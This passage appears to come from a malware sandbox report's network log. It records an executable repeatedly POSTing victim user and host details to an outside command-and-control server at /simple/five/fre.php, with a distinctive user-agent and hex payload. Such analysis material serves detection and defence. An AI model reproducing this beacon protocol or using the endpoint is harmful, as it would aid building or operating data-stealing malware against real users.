                                Jan 11, 2025 01:43:31.748334885 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:32.450759888 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:32 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                76192.168.2.85126194.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:32.602880955 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:32.607831001 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:33.314687967 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:33 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                77192.168.2.85126294.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:33.944672108 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:33.949544907 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:34.658876896 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:34 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                78192.168.2.85126394.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:34.809350967 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:34.814321995 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:35.532752037 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:35 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                79192.168.2.85126494.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:35.680735111 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:35.685741901 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:36.403749943 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:36 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                80192.168.2.85126694.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:36.559978008 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:36.565084934 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:37.315417051 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:37 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                81192.168.2.85127394.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:37.480484962 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:37.485335112 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:38.226561069 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:38 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                82192.168.2.85128094.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:38.382016897 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:38.387022972 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:39.084547043 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:38 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                83192.168.2.85128994.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:39.241821051 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:39.246712923 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:39.967514992 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:39 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                84192.168.2.85129794.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:40.179362059 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:40.188662052 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:40.906372070 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:40 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                85192.168.2.85130394.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:41.058645964 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:41.063388109 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:41.803119898 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:41 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                86192.168.2.85130994.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:42.031352043 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:42.036689997 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:42.794162035 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:42 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                87192.168.2.85131594.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:42.948031902 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:42.952923059 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:43.674802065 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:43 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                88192.168.2.85132194.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:43.897336006 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:43.902307987 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:44.613955975 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:44 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                89192.168.2.85132794.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:44.778259039 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:44.785245895 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:45.582261086 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:45 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                90192.168.2.85133394.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:45.731091022 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:45.736145973 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:46.438195944 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:46 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                91192.168.2.85133994.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:46.589720011 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:46.597242117 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:47.295649052 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:47 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                92192.168.2.85134694.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:47.452958107 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:47.457823038 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:48.196427107 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:48 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                93192.168.2.85135394.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:48.353506088 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:48.358447075 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:49.076029062 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:48 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                94192.168.2.85136094.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:49.230825901 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:49.238276958 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:49.953025103 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:49 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                95192.168.2.85136894.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:50.107481956 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:50.112870932 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:50.836159945 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:50 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                96192.168.2.85137494.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:50.987092018 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
